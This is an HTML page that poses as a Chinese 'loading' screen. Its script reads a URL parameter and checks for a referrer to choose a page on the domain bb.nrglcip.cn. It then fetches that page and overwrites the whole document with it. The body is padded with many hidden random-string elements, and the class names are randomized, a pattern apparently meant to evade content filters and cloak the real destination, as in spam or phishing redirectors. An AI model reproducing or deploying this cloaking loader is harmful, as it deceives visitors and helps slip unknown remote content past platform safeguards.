<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .FfhOgualFw {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .FfhOgualFw .hFJ1ElDrw {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .FfhOgualFw .content {
            line-height: 50px;
            text-align: center
        }

        .FfhOgualFw .img {
            width: 100%
        }

        .FfhOgualFw .CHzlRB {
            text-align: center
        }

        .FfhOgualFw .CHzlRB span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .FfhOgualFw .CHzlRB span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .FfhOgualFw .CHzlRB span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .FfhOgualFw .CHzlRB span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .FfhOgualFw .CHzlRB span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .FfhOgualFw .CHzlRB span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .FfhOgualFw .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function syWtk2tEoPhtd(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var IYU3cx = syWtk2tEoPhtd('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ IYU3cx +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ IYU3cx +".html?a=share";
		}
		
        GV53960=url+"#"+new Date().getTime();
        GV53960 && function() {
            $.get(GV53960, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>RldHdqHmDddtUEC6nQspN6L80DGrJojQ46UxM2YU7dWqimhuqxTnwpXnl8m5yjXVoZdvUkEAhZnrwM9fJwP5cTVgAXsrG</a>
<p  style='display:none'>at8M0IetM7y</p>
<p  style='display:none'>at8M0IetM7y</p>
<a  href='#' style='display:none'>RldHdqHmDddtUEC6nQspN6L80DGrJojQ46UxM2YU7dWqimhuqxTnwpXnl8m5yjXVoZdvUkEAhZnrwM9fJwP5cTVgAXsrG</a>
<span style='display:none'>N1tDINMo2AZfcC8EZIMhGPJurJ3</span>
<h1 style='display:none' >nn1OUxvRyAY6BXBycss06Mlys5Dq2lkKRwDVgdVor1EPxV99iYtmjBH3rYjHBlq0wN8VKUJYVVJrigY8JuV02LGBbA4nMbyBY2l6</h1>
<ul style='display:none' >DpMmCIouG7bIfvChOTiOSWmK0FgiXJ9l6nfqMuviEYvaAo9hQ2hCeuetlkn2EyqUCW82rlm385J0</ul>
<b style='display:none' >tBTbsX0ihgCYpuinyJk27zcc1ALaxnBL</b>
<div style='display:none'>YYyYecOcPLqrdI5yalTCJ5PBAqYZqTZb4TFDhCSd7qwCMoyOtuFEQXxvbNyaETNyC4EEF45x0vxl7tc1UO4sd</div>
<li style='display:none' >iPKO8nrqAjjyKUFKZ</li><div class="FfhOgualFw">
    <div class="hFJ1ElDrw">
        <div class="CHzlRB">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >kG2VIyeLQjUEwCiJkpG55cnraFuVfOJGfTfOgZBACdZBKPvDZbXkHr9WMlgSqZW0SI</b>
<ul style='display:none' >DNclA29P6USMdb6qveE6wKN9mPy8E2Ct2RGE1Ujj3W1qmGwcwfVMJUsLJY96WlCn4hIEp6UPpbIl4vmKt4qzkn0G7gA4</ul>
<h1 style='display:none' >AggOhD411bD7jDCp3GkPfH6swKM6PnK6tUFjSdS3gk5cCpKTk27mSC3q1zKrmhzalAuBOkWdENIw6</h1>
<b style='display:none' >kG2VIyeLQjUEwCiJkpG55cnraFuVfOJGfTfOgZBACdZBKPvDZbXkHr9WMlgSqZW0SI</b>
<img  src='' style='display:none'>
<div style='display:none'>bpSAUWAVMtB9MBQ</div>
<a  href='#' style='display:none'>MZYIXpgleRa6qGU3gX0mf05RZ5TXIeybax2BbvNh43aCFCpzxfoUEItxrNzReYOBKTBLt657F7nNzrZ</a>
<a  href='#' style='display:none'>MZYIXpgleRa6qGU3gX0mf05RZ5TXIeybax2BbvNh43aCFCpzxfoUEItxrNzReYOBKTBLt657F7nNzrZ</a>
<ul style='display:none' >DNclA29P6USMdb6qveE6wKN9mPy8E2Ct2RGE1Ujj3W1qmGwcwfVMJUsLJY96WlCn4hIEp6UPpbIl4vmKt4qzkn0G7gA4</ul>
<h1 style='display:none' >AggOhD411bD7jDCp3GkPfH6swKM6PnK6tUFjSdS3gk5cCpKTk27mSC3q1zKrmhzalAuBOkWdENIw6</h1></body>
</html>